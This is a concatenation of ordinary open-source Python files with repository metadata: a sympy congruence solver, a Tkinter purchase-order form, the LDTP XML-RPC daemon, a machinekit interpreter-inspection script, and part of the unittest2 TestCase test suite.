all moduli in another, send the arguments like this:
>>> solve_congruence(*zip((2, 3, 2), (3, 5, 7)))
(23, 105)
The moduli need not be co-prime; in this case there may or
may not be a solution:
>>> solve_congruence((2, 3), (4, 6)) is None
True
>>> solve_congruence((2, 3), (5, 6))
(5, 6)
The symmetric flag will make the result be within 1/2 of the modulus:
>>> solve_congruence((2, 3), (5, 6), symmetric=True)
(-1, 6)
See Also
========
crt : high level routine implementing the Chinese Remainder Theorem
"""
def combine(c1, c2):
"""Return the tuple (a, m) which satisfies the requirement
that n = a + i*m satisfy n = a1 + j*m1 and n = a2 = k*m2.
References
==========
- http://en.wikipedia.org/wiki/Method_of_successive_substitution
"""
a1, m1 = c1
a2, m2 = c2
a, b, c = m1, a2 - a1, m2
g = reduce(igcd, [a, b, c])
a, b, c = [i//g for i in [a, b, c]]
if a != 1:
inv_a, _, g = igcdex(a, c)
if g != 1:
return None
b *= inv_a
a, m = a1 + m1*b, m1*c
return a, m
rm = remainder_modulus_pairs
symmetric = hint.get('symmetric', False)
if hint.get('check', True):
rm = [(as_int(r), as_int(m)) for r, m in rm]
# ignore redundant pairs but raise an error otherwise; also
# make sure that a unique set of bases is sent to gf_crt if
# they are all prime.
#
# The routine will work out less-trivial violations and
# return None, e.g. for the pairs (1,3) and (14,42) there
# is no answer because 14 mod 42 (having a gcd of 14) implies
# (14/2) mod (42/2), (14/7) mod (42/7) and (14/14) mod (42/14)
# which, being 0 mod 3, is inconsistent with 1 mod 3. But to
# preprocess the input beyond checking of another pair with 42
# or 3 as the modulus (for this example) is not necessary.
uniq = {}
for r, m in rm:
r %= m
if m in uniq:
if r != uniq[m]:
return None
continue
uniq[m] = r
rm = [(r, m) for m, r in uniq.items()]
del uniq
# if the moduli are co-prime, the crt will be significantly faster;
# checking all pairs for being co-prime gets to be slow but a prime
# test is a good trade-off
if all(isprime(m) for r, m in rm):
r, m = list(zip(*rm))
return crt(m, r, symmetric=symmetric, check=False)
rv = (0, 1)
for rmi in rm:
rv = combine(rv, rmi)
if rv is None:
break
n, m = rv
n = n % m
else:
if symmetric:
return symmetric_residue(n, m), m
return n, m
| bsd-3-clause |
Ripley6811/TAIMAU | src/frames/po/prodselectf.py | 1 | 12013 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import Tix
import tkMessageBox
from utils import settings
from utils import calendar_tixradiobutton as date_picker
from utils.symbols import U_TOOLS, U_TRUCK
def main(_):
"""List products for creating orders.
Enter prices and order amounts and save as a multiple shipment order (added
to open PO list) or a one time order."""
frame = Tix.Frame(_.po_frame)
prodf = Tix.Frame(frame)
prodf.pack(side='left', anchor='n')
#XXX: Or use grid with column weighting
# Register validation methods to this frame.
prefix = u'$'
def is_float(val):
try:
float(val[1:])
except:
return True if val == prefix else False
return True
vcmd_float = frame.register(lambda x: is_float(x))
vcmd_int = frame.register(lambda x: x.isdigit())
prodrecs = []
_priceSV = [] # Store stringvar for entered prices
_qtySV = [] # Store stringvar for entered quantity
# font = (_.font, 12, 'bold')
col_default = frame.cget("bg")
def refresh():
for child in prodf.winfo_children():
child.destroy()
prodrecs.__delslice__(0,1000) # Store product records
_priceSV.__delslice__(0,1000) # Store stringvar for entered prices
_qtySV.__delslice__(0,1000) # Store stringvar for entered quantity
cog = None # Current cogroup
scm = None # Current 's' or 'c' mode (supplier or customer view)
try:
cog = _.curr.cogroup
scm = _.sc_mode
except KeyError:
return
# Retrieve user designated PO ordering if it exists.
minlen = 100
rows = settings.load().get(scm, {}).get(cog.name, range(minlen))
# Increase 'rows' length in case more prod are added.
#XXX: Possibly unnecessary. Refresh if new products added.
if len(rows) < minlen:
rows = rows + range(max(rows)+1, max(rows)+minlen-len(rows))
# Get list of product records.
query = _.dbm.session.query(_.dbm.Product)
query = query.filter_by(group = cog.name)
query = query.filter_by(discontinued = False)
query = query.filter_by(is_supply=True if scm == u's' else False)
query = query.order_by('inventory_name')
[prodrecs.append(p) for p in query.all()]
# Set default options for all widgets.
OPTS = dict(master=prodf, justify="right")#, font=font)
# Set entry widget defaults
Eopts = dict(width=8, bg=u"moccasin", validate='key', **OPTS)
_unitsVars = []
_multiplier = [] # Convert SKU to units
for row, PR in zip(rows, prodrecs):
col = 0
PrU = PR.UM if PR.unitpriced else PR.SKU
w = [] # Container for one line of widgets
# Product name and specs
w.append(Tix.Label(text=PR.name, **OPTS))
w[-1].grid(row=row, column=col, sticky='nsw'); col += 1
w.append(Tix.Label(text=PR.specs, padx=20, **OPTS))
w[-1].grid(row=row, column=col, sticky='nsw'); col += 1
# Price entry
_priceSV.append(Tix.StringVar())
_priceSV[-1].set(u'{}{}'.format(prefix, PR.price))
w.append(Tix.Entry(textvariable=_priceSV[-1],
validatecommand=(vcmd_float, '%P'), **Eopts))
w[-1].grid(row=row, column=col); col += 1
# TWD per sku/unit
w.append(Tix.Label(text=u'/{}'.format(PrU), padx=10, **OPTS))
w[-1].grid(row=row, column=col, sticky='nsw'); col += 1
# Number of units entry
_qtySV.append(Tix.StringVar())
w.append(Tix.Entry(textvariable=_qtySV[-1],
validatecommand=(vcmd_int, '%S'), **Eopts))
w[-1].grid(row=row, column=col); col += 1
# Show SKU after quantity number
text = PR.SKU
if text == u'槽車':
text = PrU
w.append(Tix.Label(text=text, padx=10, **OPTS))
w[-1].grid(row=row, column=col, sticky='nsw'); col += 1
def highlightrow(qtyi, widgets):
val = _qtySV[qtyi].get()
new_color = u'PaleTurquoise1' if len(val) else u'moccasin'
for widget in widgets:
if isinstance(widget, Tix.Entry):
widget.config(bg=new_color)
widgets[0].config(relief='raised' if len(val) else 'flat',
bg='lawngreen' if len(val) else col_default)
# Fill in total units reference
if _qtySV[qtyi].get().isdigit():
_int = int(_qtySV[qtyi].get())*_multiplier[qtyi]
# _poBs[qtyi].config(bg=u'PaleTurquoise1')
if _int.is_integer():
_int = int(_int)
_unitsVars[qtyi].set(u"{}".format(_int))
else:
# _poBs[row].config(bg=u'moccasin')
_unitsVars[qtyi].set(u"{}".format(0))
_qtySV[-1].trace('w', lambda a,b,c,i=len(_qtySV)-1, w=w:
highlightrow(i, w))
# Total units StringVar
_unitsVars.append(Tix.StringVar())
_multiplier.append(PR.units)
lw = Tix.Label(textvariable=_unitsVars[-1],
anchor='e', bg=u'LightGoldenrod1', **OPTS)
lw.grid(row=row, column=col, sticky='e'); col += 1
_unitsVars[-1].set("0")
_text = u' {}'.format(
PR.UM #if _prod.unitpriced else _prod.SKU
)
lw = Tix.Label(text=_text,
anchor='w', bg=u'LightGoldenrod1', **OPTS)
lw.grid(row=row, column=col, sticky='w'); col += 1
# Form creation panel. Make different types of POs.
formf = Tix.Frame(frame)
formf.pack(side='top', anchor='n')
ponSV = Tix.StringVar() # PO number
manSV = Tix.StringVar() # Manifest number
#TODO: Add Taimau branch selection
# Order date: preselect today
tl = Tix.Label(formf, textvariable=_.loc(u"Date of order/shipment"))
tl.grid(row=0, columnspan=1)
cal = date_picker.Calendar(formf, padx=5,
preweeks=3, postweeks=2, settoday=True)
cal.grid(row=1, columnspan=1, sticky='n')
# Order date: preselect today
tl = Tix.Label(formf, textvariable=_.loc(u"Order due date"))
tl.grid(row=0, column=1)
caldue = date_picker.Calendar(formf, padx=5, preweeks=3, postweeks=2)
caldue.grid(row=1, column=1, sticky='n')
Tix.Label(formf, textvariable=_.loc(u'Order (PO) #:'), pady=10)\
.grid(row=2, column=0, sticky='nsew')
ponEntry = Tix.Entry(formf, textvariable=ponSV, bg=u"moccasin")
ponEntry.grid(row=2, column=1, sticky='ew')
Tix.Label(formf, textvariable=_.loc(u'Manifest #:'), pady=10)\
.grid(row=3, column=0, sticky='nsew')
manEntry = Tix.Entry(formf, textvariable=manSV, bg=u"moccasin")
manEntry.grid(row=3, column=1, sticky='ew')
def createOrder(PROD, PRICE, QTY, is_open=True):
'''
PROD : Product object
PRICE : float
QTY : integer
'''
MPN = PROD.MPN
PRICE = float(PRICE.replace('$',''))
QTY = int(QTY)
if PRICE != PROD.curr_price:
PROD.curr_price = PRICE
ins = dict(MPN=MPN,
qty=QTY,
price=PRICE,
orderID=ponSV.get().upper(),
orderdate=cal.date_obj,
is_open=is_open,
ordernote=u'', #TODO:
applytax=True) #TODO:
if caldue.date_str:
ins['duedate'] = caldue.date_obj
ins['is_sale'] = True if _.sc_mode == 'c' else False
ins['is_purchase'] = True if _.sc_mode == 's' else False
ins['group'] = _.curr.cogroup.name
ins['seller'] = u'台茂' if _.sc_mode == 'c' else _.curr.branchSV.get()
ins['buyer'] = u'台茂' if _.sc_mode == 's' else _.curr.branchSV.get()
if _.debug:
print ins
return _.dbm.Order(**ins)
def createShipmentItem(order, manifest, QTY):
'''
new_order : Order object
manifest : Shipment object
QTY : integer
'''
QTY = int(QTY)
return _.dbm.ShipmentItem(
order = order,
shipment = manifest,
qty = QTY,
)
def submitPO(*args):
'''Add new POs for each item with user defined quantities.'''
if confirm_entries():
for PROD, PRICE, QTY in zip(prodrecs, _priceSV, _qtySV):
if QTY.get().isdigit() and len(PRICE.get()) > 1:
new_order = createOrder(PROD, PRICE.get(), QTY.get())
_.dbm.session.add(new_order)
_.dbm.session.commit()
refresh()
try:
_.load_company()
except AttributeError:
pass
def submitMF(*args):
'''Add new POs and manifest for all items with defined quantities.
Set POs as inactive (single-use).'''
if len([1 for Q in _qtySV if Q.get().isdigit()]) > 5 and _.sc_mode == 'c':
title = u'Too many items.'
message = u'Each manifest can only have five items.'
tkMessageBox.showerror(title, message)
return
if confirm_entries():
manifest = _.dbm.existing_shipment(manSV.get(),
cal.date_obj,
_.curr.cogroup.name)
if not manifest:
manifest = _.dbm.Shipment(
shipmentdate = cal.date_obj,
shipment_no = manSV.get().upper(),
# shipmentnote = ,
# driver = ,
# truck = ,
)
for PROD, PRICE, QTY in zip(prodrecs, _priceSV, _qtySV):
if QTY.get().isdigit() and len(PRICE.get()) > 1:
new_order = createOrder(PROD, PRICE.get(), QTY.get(), is_open=False)
item = createShipmentItem(new_order, manifest, QTY.get())
_.dbm.session.add(item)
_.dbm.session.commit()
try:
_.load_company()
except AttributeError:
pass
po_button = Tix.Button(formf, textvariable=_.loc(U_TOOLS+u" Create Product Order (PO)"),
pady=12, bg=u'lawngreen', command=submitPO)
po_button.grid(row=4, column=0, sticky='nsew')
def toggle_po_button(*args):
if manSV.get():
po_button['state'] = 'disabled'
else:
po_button['state'] = 'normal'
manSV.trace('w', toggle_po_button)
Tix.Button(formf, textvariable=_.loc(U_TRUCK+u" Create Single Shipment PO"),
pady=12, bg=u'lawngreen', command=submitMF).grid(row=4, column=1, sticky='nsew')
def confirm_entries():
title = u'Confirm entries'
message = _.loc(u'Verify these entries:',1)
message += u'\n\n日期 : {}'.format(cal.date_str)
message += u'\n分司 : {}'.format(_.curr.branchSV.get())
message += u'\n訂單#: {}'.format(ponSV.get())
message += u'\n出貨#: {}'.format(manSV.get())
for PROD, PRICE, QTY in zip(prodrecs, _priceSV, _qtySV):
if len(QTY.get()) > 0:
message += u'\n\t{}{} {} @ {}/{}'.format(
QTY.get(), PROD.UM if PROD.SKU==u'槽車' else PROD.SKU,
PROD.name,
PRICE.get(), PROD.PrMeas,
)
return tkMessageBox.askokcancel(title, message)
_.prodselectf = frame
_.prodselectf.refresh = refresh
try:
_.refresh.append(refresh)
except KeyError:
_.refresh = [refresh,]
return frame
| gpl-2.0 |
ldtp/ldtp2 | ldtpd/xmlrpc_daemon.py | 3 | 4888 | """
LDTP v2 xml rpc daemon.
@author: Eitan Isaacson <[email protected]>
@author: Nagappan Alagappan <[email protected]>
@copyright: Copyright (c) 2009 Eitan Isaacson
@copyright: Copyright (c) 2009-13 Nagappan Alagappan
@license: LGPL
http://ldtp.freedesktop.org
This file may be distributed and/or modified under the terms of the GNU Lesser General
Public License version 2 as published by the Free Software Foundation. This file
is distributed without any warranty; without even the implied warranty of
merchantability or fitness for a particular purpose.
See "COPYING" in the source distribution for more information.
Headers in this file shall remain intact.
"""
import os
import re
import time
import core
from core import Ldtpd
from twisted.web import xmlrpc
import xmlrpclib
from log import logger
if 'LDTP_COMMAND_DELAY' in os.environ:
delay = os.environ['LDTP_COMMAND_DELAY']
else:
delay = None
_ldtp_debug = os.environ.get('LDTP_DEBUG', None)
_ldtp_debug_file = os.environ.get('LDTP_DEBUG_FILE', None)
class XMLRPCLdtpd(Ldtpd, xmlrpc.XMLRPC, object):
def __new__(cls, *args, **kwargs):
for symbol in dir(Ldtpd):
if symbol.startswith('_'):
continue
obj = getattr(cls, symbol)
if not callable(obj):
continue
setattr(cls, 'xmlrpc_'+symbol, obj)
return object.__new__(cls, *args, **kwargs)
def __init__(self):
xmlrpc.XMLRPC.__init__(self, allowNone = True)
Ldtpd.__init__(self)
def _listFunctions(self):
return [a[7:] for a in \
filter(lambda x: x.startswith('xmlrpc_'), dir(self))]
# Starting twisted 11.1
listProcedures = _listFunctions
if not _ldtp_debug:
# If LDTP_DEBUG env set, then print verbose info on console
def _ebRender(self, failure):
"""Custom error render method (used by our XMLRPC objects)"""
if isinstance(failure.value, xmlrpclib.Fault):
return failure.value
if hasattr(failure, 'getErrorMessage'):
value = failure.getErrorMessage()
else:
value = 'error'
return xmlrpclib.Fault(self.FAILURE, value)
def render_POST(self, request):
request.content.seek(0, 0)
request.setHeader("content-type", "text/xml")
try:
args, functionPath = xmlrpclib.loads(request.content.read())
if args and isinstance(args[-1], dict):
# Passing args and kwargs to _ldtp_callback
# fail, so using self, kind of work around !
kwargs = args[-1]
args = args[:-1]
if delay or self._delaycmdexec:
pattern = '(wait|exist|has|get|verify|enabled|'
pattern += 'launch|image|system)'
p = re.compile(pattern)
if not p.search(functionPath):
# Sleep for 1 second, else the at-spi-registryd dies,
# on the speed we execute
try:
if self._delaycmdexec:
self.wait(float(self._delaycmdexec))
else:
self.wait(float(delay))
except ValueError:
time.sleep(0.5)
else:
kwargs = {}
except Exception as e:
f = xmlrpc.Fault(
self.FAILURE, "Can't deserialize input: %s" % (e,))
self._cbRender(f, request)
else:
try:
if hasattr(self, 'lookupProcedure'):
# Starting twisted 11.1
function = self.lookupProcedure(functionPath)
else:
function = self._getFunction(functionPath)
except xmlrpc.Fault as f:
self._cbRender(f, request)
else:
if _ldtp_debug:
debug_st = '%s(%s)' % \
(functionPath,
', '.join(map(repr, args) + \
['%s=%s' % (k, repr(v)) \
for k, v in kwargs.items()]))
print(debug_st)
logger.debug(debug_st)
if _ldtp_debug_file:
with open(_ldtp_debug_file, "a") as fp:
fp.write(debug_st)
xmlrpc.defer.maybeDeferred(function, *args,
**kwargs).\
addErrback(self._ebRender).\
addCallback(self._cbRender,
request)
return xmlrpc.server.NOT_DONE_YET
| lgpl-2.1 |
RunningLight/machinekit | configs/sim/axis/remap/iocontrol-removed/python/embedding.py | 28 | 1709 | # a tour of accessing interpreter internals
def call_stack(self,*args):
print "------- interpreter call stack: "
for i in range(self.call_level):
s = self.sub_context[i]
print "%d: position=%d sequence_number=%d filename=%s subname=%s context_status=%x" % (i, s.position, s.sequence_number,s.filename,s.subname,s.context_status),
print "named_params=",s.named_params
def remap_stack(self, *args):
print "------- interpreter remap stack: "
for i in range(self.remap_level):
r = self.blocks[i].executing_remap
print "%d: name=%s argspec=%s prolog_func=%s ngc=%s py=%s epilog=%s modal_group=%d" % (r.name,r.argspec,r.prolog_func,r.ngc,r.epilog_func,r.modal_group)
def tooltable(self, *args):
print "------- tool table:"
for i in range(len(self.tool_table)):
t = self.tool_table[i]
if t.toolno != -1: print str(t)
print "tool in spindle=%d pocketPrepped=%d" % (self.current_tool,self.selected_pocket)
def show_block(self,*args):
if len(args) > 0:
n = int(args[0])
else:
n = 0
b = self.blocks[n]
print "-- blocks[%d]" % (n)
print "line_number=%d o_name=%s p_flag=%d p_number%g q_flag=%d q_number=%g comment=%s" % (b.line_number,b.o_name,b.p_flag,b.p_number,b.q_flag,b.q_number,b.comment)
def show(self,*args):
print "dir(interpreter)=",dir(self)
tooltable(self)
show_block(self,0)
if self.remap_level: show_block(self,self.remap_level)
call_stack(self)
remap_stack(self)
print "active G codes:",self.active_g_codes
print "active M codes:",self.active_m_codes
print "active settings:",self.active_settings
print "parameters:",self.parameters
| lgpl-2.1 |
eformat/vertx-web | vertx-web/src/test/sockjs-protocol/venv/lib/python2.7/site-packages/unittest2/test/test_case.py | 13 | 51351 | import contextlib
from copy import deepcopy
import difflib
import gc
import pickle
import pprint
import re
import sys
import logging
import six
from six import b, u
import unittest2
import unittest2 as unittest
from unittest2.test.support import (
OldTestResult, EqualityMixin, HashingMixin, LoggingResult,
LegacyLoggingResult
)
from .support import captured_stderr
log_foo = logging.getLogger('foo')
log_foobar = logging.getLogger('foo.bar')
log_quux = logging.getLogger('quux')
class MyException(Exception):
pass
class Test(object):
"Keep these TestCase classes out of the main namespace"
class Foo(unittest2.TestCase):
def runTest(self): pass
def test1(self): pass
class Bar(Foo):
def test2(self): pass
class LoggingTestCase(unittest2.TestCase):
"""A test case which logs its calls."""
def __init__(self, events):
super(Test.LoggingTestCase, self).__init__('test')
self.events = events
def setUp(self):
self.events.append('setUp')
def test(self):
self.events.append('test')
def tearDown(self):
self.events.append('tearDown')
class Test_TestCase(unittest2.TestCase, EqualityMixin, HashingMixin):
### Set up attributes used by inherited tests
################################################################
# Used by HashingMixin.test_hash and EqualityMixin.test_eq
eq_pairs = [(Test.Foo('test1'), Test.Foo('test1'))]
# Used by EqualityMixin.test_ne
ne_pairs = [(Test.Foo('test1'), Test.Foo('runTest')),
(Test.Foo('test1'), Test.Bar('test1')),
(Test.Foo('test1'), Test.Bar('test2'))]
################################################################
### /Set up attributes used by inherited tests
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
# ...
# "methodName defaults to "runTest"."
#
# Make sure it really is optional, and that it defaults to the proper
# thing.
def test_init__no_test_name(self):
class Test(unittest2.TestCase):
def runTest(self): raise MyException()
def test(self): pass
self.assertEqual(Test().id()[-13:], '.Test.runTest')
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
def test_init__test_name__valid(self):
class Test(unittest2.TestCase):
def runTest(self): raise MyException()
def test(self): pass
self.assertEqual(Test('test').id()[-10:], '.Test.test')
# "class unittest2.TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
def test_init__test_name__invalid(self):
class Test(unittest2.TestCase):
def runTest(self): raise MyException()
def test(self): pass
try:
Test('testfoo')
except ValueError:
pass
else:
self.fail("Failed to raise ValueError")
# "Return the number of tests represented by the this test object. For
# TestCase instances, this will always be 1"
def test_countTestCases(self):
class Foo(unittest2.TestCase):
def test(self): pass
self.assertEqual(Foo('test').countTestCases(), 1)
# "Return the default type of test result object to be used to run this
# test. For TestCase instances, this will always be
# unittest2.TestResult; subclasses of TestCase should
# override this as necessary."
def test_defaultTestResult(self):
class Foo(unittest2.TestCase):
def runTest(self):
pass
result = Foo().defaultTestResult()
self.assertEqual(type(result), unittest2.TestResult)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if setUp() raises
# an exception.
def test_run_call_order__error_in_setUp(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def setUp(self):
super(Foo, self).setUp()
raise RuntimeError('raised by Foo.setUp')
Foo(events).run(result)
expected = ['startTest', 'setUp', 'addError', 'stopTest']
self.assertEqual(events, expected)
# "With a temporary result stopTestRun is called when setUp errors.
def test_run_call_order__error_in_setUp_default_result(self):
events = []
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def setUp(self):
super(Foo, self).setUp()
raise RuntimeError('raised by Foo.setUp')
Foo(events).run()
expected = ['startTestRun', 'startTest', 'setUp', 'addError',
'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test raises
# an error (as opposed to a failure).
def test_run_call_order__error_in_test(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
raise RuntimeError('raised by Foo.test')
expected = ['startTest', 'setUp', 'test', 'tearDown', 'addError',
'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
# "With a default result, an error in the test still results in stopTestRun
# being called."
def test_run_call_order__error_in_test_default_result(self):
events = []
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def test(self):
super(Foo, self).test()
raise RuntimeError('raised by Foo.test')
expected = ['startTestRun', 'startTest', 'setUp', 'test',
'tearDown', 'addError', 'stopTest', 'stopTestRun']
Foo(events).run()
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test signals
# a failure (as opposed to an error).
def test_run_call_order__failure_in_test(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
self.fail('raised by Foo.test')
expected = ['startTest', 'setUp', 'test', 'tearDown', 'addFailure',
'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
# "When a test fails with a default result stopTestRun is still called."
def test_run_call_order__failure_in_test_default_result(self):
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def test(self):
super(Foo, self).test()
self.fail('raised by Foo.test')
expected = ['startTestRun', 'startTest', 'setUp', 'test',
'tearDown', 'addFailure', 'stopTest', 'stopTestRun']
events = []
Foo(events).run()
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if tearDown() raises
# an exception.
def test_run_call_order__error_in_tearDown(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def tearDown(self):
super(Foo, self).tearDown()
raise RuntimeError('raised by Foo.tearDown')
Foo(events).run(result)
expected = ['startTest', 'setUp', 'test', 'tearDown', 'addError',
'stopTest']
self.assertEqual(events, expected)
# "When tearDown errors with a default result stopTestRun is still called."
def test_run_call_order__error_in_tearDown_default_result(self):
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def tearDown(self):
super(Foo, self).tearDown()
raise RuntimeError('raised by Foo.tearDown')
events = []
Foo(events).run()
expected = ['startTestRun', 'startTest', 'setUp', 'test', 'tearDown',
'addError', 'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
# "TestCase.run() still works when the defaultTestResult is a TestResult
# that does not support startTestRun and stopTestRun.
def test_run_call_order_default_result(self):
class Foo(unittest2.TestCase):
def defaultTestResult(self):
return OldTestResult()
def test(self):
pass
Foo('test').run()
def _check_call_order__subtests(self, result, events, expected_events):
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
for i in [1, 2, 3]:
with self.subTest(i=i):
if i == 1:
self.fail('failure')
for j in [2, 3]:
with self.subTest(j=j):
if i * j == 6:
raise RuntimeError('raised by Foo.test')
1 / 0
# Order is the following:
# i=1 => subtest failure
# i=2, j=2 => subtest success
# i=2, j=3 => subtest error
# i=3, j=2 => subtest error
# i=3, j=3 => subtest success
# toplevel => error
Foo(events).run(result)
self.assertEqual(events, expected_events)
def test_run_call_order__subtests(self):
events = []
result = LoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSubTestFailure', 'addSubTestSuccess',
'addSubTestFailure', 'addSubTestFailure',
'addSubTestSuccess', 'addError', 'stopTest']
self._check_call_order__subtests(result, events, expected)
def test_run_call_order__subtests_legacy(self):
# With a legacy result object (without a addSubTest method),
# text execution stops after the first subtest failure.
events = []
result = LegacyLoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addFailure', 'stopTest']
self._check_call_order__subtests(result, events, expected)
def _check_call_order__subtests_success(self, result, events, expected_events):
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
for i in [1, 2]:
with self.subTest(i=i):
for j in [2, 3]:
with self.subTest(j=j):
pass
Foo(events).run(result)
self.assertEqual(events, expected_events)
def test_run_call_order__subtests_success(self):
events = []
result = LoggingResult(events)
# The 6 subtest successes are individually recorded, in addition
# to the whole test success.
expected = (['startTest', 'setUp', 'test', 'tearDown']
+ 6 * ['addSubTestSuccess']
+ ['addSuccess', 'stopTest'])
self._check_call_order__subtests_success(result, events, expected)
def test_run_call_order__subtests_success_legacy(self):
# With a legacy result, only the whole test success is recorded.
events = []
result = LegacyLoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSuccess', 'stopTest']
self._check_call_order__subtests_success(result, events, expected)
def test_run_call_order__subtests_failfast(self):
events = []
result = LoggingResult(events)
result.failfast = True
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
with self.subTest(i=1):
self.fail('failure')
with self.subTest(i=2):
self.fail('failure')
self.fail('failure')
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSubTestFailure', 'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
def test_subtests_failfast(self):
# Ensure proper test flow with subtests and failfast (issue #22894)
events = []
class Foo(unittest.TestCase):
def test_a(self):
with self.subTest():
events.append('a1')
events.append('a2')
def test_b(self):
with self.subTest():
events.append('b1')
with self.subTest():
self.fail('failure')
events.append('b2')
def test_c(self):
events.append('c')
result = unittest.TestResult()
result.failfast = True
suite = unittest.makeSuite(Foo)
suite.run(result)
expected = ['a1', 'a2', 'b1']
self.assertEqual(events, expected)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework. The initial value of this
# attribute is AssertionError"
def test_failureException__default(self):
class Foo(unittest2.TestCase):
def test(self):
pass
self.assertIs(Foo('test').failureException, AssertionError)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework."
#
# Make sure TestCase.run() respects the designated failureException
def test_failureException__subclassing__explicit_raise(self):
events = []
result = LoggingResult(events)
class Foo(unittest2.TestCase):
def test(self):
raise RuntimeError()
failureException = RuntimeError
self.assertIs(Foo('test').failureException, RuntimeError)
Foo('test').run(result)
expected = ['startTest', 'addFailure', 'stopTest']
self.assertEqual(events, expected)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework."
#
# Make sure TestCase.run() respects the designated failureException
def test_failureException__subclassing__implicit_raise(self):
events = []
result = LoggingResult(events)
class Foo(unittest2.TestCase):
def test(self):
self.fail("foo")
failureException = RuntimeError
self.assertIs(Foo('test').failureException, RuntimeError)
Foo('test').run(result)
expected = ['startTest', 'addFailure', 'stopTest']
self.assertEqual(events, expected)
# "The default implementation does nothing."
def test_setUp(self):
class Foo(unittest2.TestCase):
def runTest(self):
pass
# ... and nothing should happen
Foo().setUp()
# "The default implementation does nothing."
def test_tearDown(self):
class Foo(unittest2.TestCase):
def runTest(self):
pass
# ... and nothing should happen
Foo().tearDown()
# "Return a string identifying the specific test case."
#
# Because of the vague nature of the docs, I'm not going to lock this
# test down too much. Really all that can be asserted is that the id()
# will be a string (either 8-byte or unicode -- again, because the docs
# just say "string")
def test_id(self):
class Foo(unittest2.TestCase):
def runTest(self):
pass
self.assertIsInstance(Foo().id(), six.string_types)
# "If result is omitted or None, a temporary result object is created
# and used, but is not made available to the caller. As TestCase owns the
# temporary result startTestRun and stopTestRun are called.
def test_run__uses_defaultTestResult(self):
events = []
class Foo(unittest2.TestCase):
def test(self):
events.append('test')
def defaultTestResult(self):
return LoggingResult(events)
# Make run() find a result object on its own
Foo('test').run()
expected = ['startTestRun', 'startTest', 'test', 'addSuccess',
'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
def testShortDescriptionWithoutDocstring(self):
self.assertIsNone(self.shortDescription())
def testShortDescriptionWithOneLineDocstring(self):
"""Tests shortDescription() for a method with a docstring."""
self.assertEqual(
self.shortDescription(),
'Tests shortDescription() for a method with a docstring.')
def testShortDescriptionWithMultiLineDocstring(self):
"""Tests shortDescription() for a method with a longer docstring.
This method ensures that only the first line of a docstring is
returned used in the short description, no matter how long the
whole thing is.
"""
self.assertEqual(
self.shortDescription(),
'Tests shortDescription() for a method with a longer '
'docstring.')
def testAddTypeEqualityFunc(self):
class SadSnake(object):
"""Dummy class for test_addTypeEqualityFunc."""
s1, s2 = SadSnake(), SadSnake()
self.assertNotEqual(s1, s2)
def AllSnakesCreatedEqual(a, b, msg=None):
return type(a) is type(b) is SadSnake
self.addTypeEqualityFunc(SadSnake, AllSnakesCreatedEqual)
self.assertEqual(s1, s2)
# No this doesn't clean up and remove the SadSnake equality func
# from this TestCase instance but since its a local nothing else
# will ever notice that.
def testAssertIs(self):
thing = object()
self.assertIs(thing, thing)
self.assertRaises(self.failureException, self.assertIs, thing, object())
def testAssertIsNot(self):
thing = object()
self.assertIsNot(thing, object())
self.assertRaises(self.failureException, self.assertIsNot, thing, thing)
def testAssertIsInstance(self):
thing = []
self.assertIsInstance(thing, list)
self.assertRaises(self.failureException, self.assertIsInstance,
thing, dict)
def testAssertNotIsInstance(self):
thing = []
self.assertNotIsInstance(thing, dict)
self.assertRaises(self.failureException, self.assertNotIsInstance,
thing, list)
def testAssertIn(self):
